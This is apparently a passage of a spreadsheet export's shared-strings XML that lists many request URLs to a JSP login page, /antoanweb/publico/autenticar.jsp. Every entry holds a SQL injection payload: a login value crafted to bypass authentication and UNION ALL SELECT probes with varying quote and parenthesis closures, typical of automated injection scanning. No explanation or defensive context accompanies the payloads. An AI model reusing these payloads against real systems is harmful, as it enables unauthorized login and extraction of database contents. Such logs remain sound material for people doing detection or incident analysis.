    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670,7670--and('xoum'like'xoum</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439,3439--and('yfmq'like'yfmq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805,6805--and('zctz'like'zctz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915,915--and('viln'like'viln</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278,8278--and('blfu'like'blfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075,5075--and('ujpq'like'ujpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418,9418--and('yoff'like'yoff</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683,8683--and(('dopz'like'dopz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738--and(('qvbb'like'qvbb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641--and(('gqbi'like'gqbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444,444--and(('qasb'like'qasb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140--and(('ujid'like'ujid</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195,8195--and(('utbd'like'utbd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921,6921--and(('khid'like'khid</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722,2722--and(('qvse'like'qvse</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671,671--and(('joly'like'joly</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212--and(('dpbv'like'dpbv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942,942--and((('mejz'like'mejz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209,6209--and((('wnub'like'wnub</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811--and((('hagz'like'hagz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598,9598--and((('yger'like'yger</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219,3219--and((('nocd'like'nocd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914,2914--and((('pmjz'like'pmjz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740,4740--and((('duuy'like'duuy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430,4430--and((('jnaz'like'jnaz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262--and((('mtho'like'mtho</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435,2435--and((('lnux'like'lnux</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375--and'ydxf'like'ydxf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011,4011--and'txmn'like'txmn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386,8386--and'kmyv'like'kmyv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696,696--and'rfyx'like'rfyx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6--and'mjui'like'mjui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088,4088--and'knox'like'knox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743,743--and'wjlx'like'wjlx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046,2046--and'mimk'like'mimk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879,1879--and'uhah'like'uhah</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375--and'rboq'like'rboq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379,6379--and("ejcs"="ejcs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575,1575--and("zbsa"="zbsa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957,4957--and("xlyd"="xlyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385,5385--and("njjc"="njjc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835--and("lkep"="lkep</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287,7287--and("bjir"="bjir</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961--and("ohoy"="ohoy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791,791--and("piuf"="piuf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055,8055--and("qjrq"="qjrq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483--and("ipcl"="ipcl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170,8170--and(("epdf"="epdf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008,9008--and(("mqyh"="mqyh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771,5771--and(("zmip"="zmip</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179,9179--and(("zcyj"="zcyj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374,1374--and(("tyza"="tyza</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162,8162--and(("imbr"="imbr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933,933--and(("zune"="zune</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857,857--and(("gaku"="gaku</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373,6373--and(("ikdx"="ikdx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634,8634--and(("nkcr"="nkcr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491--and((("vtgz"="vtgz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986,3986--and((("ivao"="ivao</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597,7597--and((("qqjq"="qqjq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543,4543--and((("psdx"="psdx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301--and((("ezeo"="ezeo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974,3974--and((("ntat"="ntat</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969,5969--and((("elne"="elne</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673--and((("vhpc"="vhpc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662,7662--and((("ejpw"="ejpw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973,6973--and((("wfjj"="wfjj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399,7399--and"ojuo"="ojuo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369,369--and"vuos"="vuos</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299,299--and"ycqo"="ycqo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745,3745--and"zrlc"="zrlc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884,9884--and"neje"="neje</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056,7056--and"dqaf"="dqaf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876,3876--and"cgxu"="cgxu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413,2413--and"dbar"="dbar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464,6464--and"zcof"="zcof</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428--and"fvoj"="fvoj</t>
  </si>
  <si>
